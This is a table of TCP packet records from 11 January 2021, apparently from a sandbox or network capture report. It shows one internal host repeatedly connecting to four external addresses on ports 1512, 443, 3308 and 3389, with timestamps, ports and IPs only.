Jan 11, 2021 16:52:50.737549067 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:50.737704039 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.739973068 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.793999910 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:50.801578999 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:50.801604033 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:50.801732063 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.819890976 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.875211000 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:50.875452995 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.886895895 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.887011051 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.939764977 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:50.940049887 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:50.977638960 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:50.992873907 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:51.096504927 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:51.096525908 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:51.096723080 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:51.101636887 CET	49230	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:51.154414892 CET	1512	49230	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:51.209826946 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.261662006 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.262490988 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.263787031 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.315613985 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.330600023 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.331471920 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.348712921 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.402715921 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.403052092 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.412323952 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.412602901 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.465570927 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.465823889 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.518059969 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.635466099 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.635514021 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.635644913 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.637887955 CET	49231	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:51.689721107 CET	443	49231	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:51.753422976 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.796562910 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.796674967 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.797420025 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.841284990 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.851557016 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.851578951 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.851650000 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.858798981 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.903599024 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.903680086 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.909178019 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.909396887 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.952538013 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.952673912 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:51.993350983 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.995671988 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:51.995686054 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:52.107670069 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:52.107693911 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:52.107903004 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:52.110111952 CET	49232	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:52.153093100 CET	3308	49232	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:52.217068911 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.270699024 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.270801067 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.277657032 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.331486940 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.353121042 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.353144884 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.353297949 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.362771988 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.424510002 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.424693108 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.429583073 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.429723978 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.483257055 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.483417034 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.523066044 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.538220882 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.538242102 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.625950098 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.625977039 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.626147985 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.626296997 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.629266024 CET	49233	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:52.683634996 CET	3389	49233	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:52.732376099 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.786608934 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:52.786700010 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.787544966 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.840378046 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:52.850718021 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:52.850749016 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:52.850888968 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.858925104 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.914367914 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:52.914535046 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.920234919 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.920316935 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:52.973261118 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:52.973427057 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:53.014034986 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:53.026259899 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:53.026282072 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:53.125818968 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:53.125864029 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:53.125963926 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:53.126013041 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:53.259713888 CET	49234	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:53.312638044 CET	1512	49234	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:53.376260996 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.428277969 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.428456068 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.429897070 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.481827021 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.496804953 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.496896982 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.503314972 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.557596922 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.557810068 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.566565037 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.566716909 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.618583918 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.618721008 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.655119896 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.671175003 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.788516998 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.788566113 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:53.788770914 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.899595976 CET	49235	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:53.951522112 CET	443	49235	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:54.017460108 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.060694933 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.060810089 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.061836958 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.105123997 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.115598917 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.115653992 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.115677118 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.115736008 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.122605085 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.168844938 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.168920994 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.172635078 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.172792912 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.215915918 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.216063023 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.257201910 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.259423018 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.259476900 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.370874882 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.370909929 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.371026993 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.371061087 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.695396900 CET	49236	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:54.738738060 CET	3308	49236	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:54.857265949 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:54.911623955 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:54.911813021 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:54.915893078 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:54.970084906 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:54.990514040 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:54.990542889 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:54.990686893 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.067529917 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.128453016 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.128524065 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.132236004 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.132308006 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.186870098 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.187112093 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.226353884 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.241472006 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.241520882 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.332326889 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.332374096 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.332612991 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.374958038 CET	49237	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:55.429140091 CET	3389	49237	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:55.481051922 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.534264088 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.534388065 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.536525011 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.589696884 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.596391916 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.596416950 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.596493006 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.610444069 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.664525986 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.664752960 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.674987078 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.675360918 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.728418112 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.728672981 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.781851053 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.884799004 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.884845018 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:55.885206938 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.890361071 CET	49238	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:55.943589926 CET	1512	49238	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:56.010848999 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.063026905 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.063118935 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.064114094 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.115977049 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.130652905 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.130748987 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.139322996 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.193619013 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.193804026 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.208663940 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.209594965 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.261646032 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.261822939 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.313895941 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.430553913 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.430593967 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.430898905 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.436490059 CET	49239	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:56.488549948 CET	443	49239	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:56.559005022 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.602298021 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.602560997 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.604474068 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.647542953 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.659493923 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.659512997 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.659732103 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.675715923 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.721149921 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.721355915 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.732914925 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.733534098 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.776633978 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.776762009 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.816932917 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.819953918 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.819986105 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.934058905 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.934101105 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:56.934314966 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.939888000 CET	49240	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:56.983009100 CET	3308	49240	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:57.057212114 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.111325026 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.111453056 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.113054037 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.168486118 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.182168961 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.182239056 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.182260990 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.182282925 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.194597960 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.256741047 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.256882906 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.260813951 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.260920048 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.315387011 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.315584898 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.355271101 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.369733095 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.369791985 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.457725048 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.457768917 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.457878113 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.457914114 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.459903955 CET	49241	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:52:57.514147997 CET	3389	49241	5.100.228.233	192.168.2.22
Jan 11, 2021 16:52:57.568353891 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.621511936 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.621608973 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.622756004 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.675587893 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.682463884 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.682497978 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.682575941 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.689862967 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.743716002 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.743938923 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.753653049 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.753887892 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.806642056 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.806752920 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.844460011 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.859448910 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.859472036 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.958817959 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.958894968 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:57.958897114 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.958955050 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:57.960971117 CET	49242	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:52:58.013886929 CET	1512	49242	46.105.131.65	192.168.2.22
Jan 11, 2021 16:52:58.072081089 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.124033928 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.124155998 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.125641108 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.177306890 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.192353010 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.192456007 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.204642057 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.258543015 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.258681059 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.263349056 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.263498068 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.315104008 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.315274954 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.366998911 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.484639883 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.484693050 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.484888077 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.491353989 CET	49243	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:52:58.543179035 CET	443	49243	77.220.64.37	192.168.2.22
Jan 11, 2021 16:52:58.602513075 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.645781040 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.645992041 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.647526979 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.690701008 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.701529026 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.701577902 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.701647997 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.701708078 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.718573093 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.764067888 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.764313936 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.775105953 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.775415897 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.818732977 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.824022055 CET	49244	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:52:58.858489037 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.867247105 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.867269993 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.981806040 CET	3308	49244	80.86.91.27	192.168.2.22
Jan 11, 2021 16:52:58.981827974 CET	3308	49244	80.86.91.27	192.168.2.22
